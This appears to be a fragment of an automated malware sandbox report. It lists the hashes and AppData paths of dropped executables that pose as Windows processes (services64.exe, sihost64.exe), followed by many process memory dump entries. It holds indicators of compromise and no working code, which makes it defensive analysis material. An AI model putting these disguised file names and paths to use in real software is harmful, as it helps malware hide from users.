
SHA1
3dc878e63880e506be67f0dbd9b531da7b21e1cb

SHA256
c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

SHA512
3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

Download Submit
\Users\Admin\AppData\Local\Temp\services32.exe
MD5
846b9e20fc1ea8d299069866bf46ed41

SHA1
3dc878e63880e506be67f0dbd9b531da7b21e1cb

SHA256
c9e761cde77de4df50b3983eb0d276044d4d4814f023618c659df8a0fe276309

SHA512
3fa665df2f168f640b3e96f5ad763003a12182f78e36e7c6d43ef3ed075a33c71d2852a0c56ea011368312c4932c029ead08d6b11799a2499eea7166b449cdb3

Download Submit
\Users\Admin\AppData\Local\Temp\services64.exe
MD5
d915eb706a9ad54f27c85a84e2a75704

SHA1
5c50e7e131c9d20ef07d0427d1d2f1046c185855

SHA256
58451f2c776d0eaa6e66158b0bd5e3a9dbeab0a3330d82bcd67ddb39993cc2e3

SHA512
46743f1c132284b0ed756eb620f4a1d27484c1e7f5b68579295d52e274f36a1606050b3c75c491bfab5e5d91717b5680663e36d482f149e9e860a02f05374984

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
MD5
a891eeeb9726b351e7b8774a0711b01d

SHA1
6cfc9f8b0aca2645b4dfc0913fdf4013b29532dd

SHA256
41254f4ef060944b40cb73dc4883cff3ba321006cdf605cc058a7baf1cb704c6

SHA512
600e4475cbf675b2295a8540d61fd91b416d8f2d965f098aaa11855b7210a401a5b7942c298f213f544b2c82cc4c82d9130607affe92ebc52032267ababb01c3

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
MD5
767b138625feab1d12a2a5ca186fe2a0

SHA1
129f88e5a21e167adbc8c156aa25f8514de82bfc

SHA256
97be56392d3b36d92901eea57a18cffca2d8b1df459e6c5600e74755348bd04b

SHA512
d0dec5337c649f131d2ef53f8798998efeda87b56be709234990072cb706ea3a1f27d2e556a6d667182371303a944f4d849fd7de58af8be670b62d75ff112947

Download Submit
memory/320-96-0x0000000000000000-mapping.dmp

Download
memory/436-104-0x0000000000000000-mapping.dmp

Download
memory/436-166-0x0000000077650000-0x0000000077660000-memory.dmp

Filesize
64KB

Download
memory/436-181-0x000000001C880000-0x000000001C882000-memory.dmp

Filesize
8KB

Download
memory/1104-218-0x0000000000000000-mapping.dmp

Download
memory/1136-169-0x0000000000000000-mapping.dmp

Download
memory/1172-165-0x0000000077650000-0x0000000077660000-memory.dmp

Filesize
64KB

Download
memory/1172-179-0x000000001C680000-0x000000001C682000-memory.dmp

Filesize
8KB

Download
memory/1172-100-0x0000000000000000-mapping.dmp

Download
memory/1216-219-0x00000001402EB66C-mapping.dmp

Download
memory/1216-229-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/1216-231-0x0000000000140000-0x0000000000160000-memory.dmp

Filesize
128KB

Download
memory/1216-97-0x0000000000000000-mapping.dmp

Download
memory/1248-177-0x0000000000000000-mapping.dmp

Download
memory/1284-178-0x0000000000000000-mapping.dmp

Download
memory/1356-228-0x0000000002D20000-0x0000000002D22000-memory.dmp

Filesize
8KB

Download
memory/1356-215-0x0000000077650000-0x0000000077660000-memory.dmp

Filesize
64KB

Download
memory/1356-183-0x0000000000000000-mapping.dmp

Download
memory/1740-227-0x0000000000000000-mapping.dmp

Download
memory/1756-60-0x0000000075FE1000-0x0000000075FE3000-memory.dmp

Filesize
8KB

Download
memory/1832-180-0x000000001BB90000-0x000000001BB92000-memory.dmp

Filesize
8KB

Download
memory/1832-171-0x0000000000000000-mapping.dmp

Download
memory/1948-168-0x0000000000000000-mapping.dmp

Download
memory/1984-76-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-73-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-84-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-83-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-82-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-81-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-86-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-80-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-79-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-87-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-78-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-77-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-95-0x0000000000680000-0x0000000000689000-memory.dmp

Filesize
36KB

Download
memory/1984-88-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-89-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-75-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-74-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-85-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-90-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-72-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-71-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-98-0x000000001C5B0000-0x000000001C5B2000-memory.dmp

Filesize
8KB

Download
memory/1984-70-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-68-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-69-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-67-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-66-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-221-0x0000000000000000-mapping.dmp

Download
memory/1984-92-0x000000013F3C0000-0x000000013F3C1000-memory.dmp

Filesize
4KB

Download
memory/1984-94-0x0000000077650000-0x0000000077660000-memory.dmp

Filesize
64KB

Download
memory/1984-65-0x0000000077420000-0x0000000077430000-memory.dmp

Filesize
64KB

Download
memory/1984-230-0x000000001B620000-0x000000001B622000-memory.dmp

Filesize
8KB

Download
memory/1984-62-0x0000000000000000-mapping.dmp

Download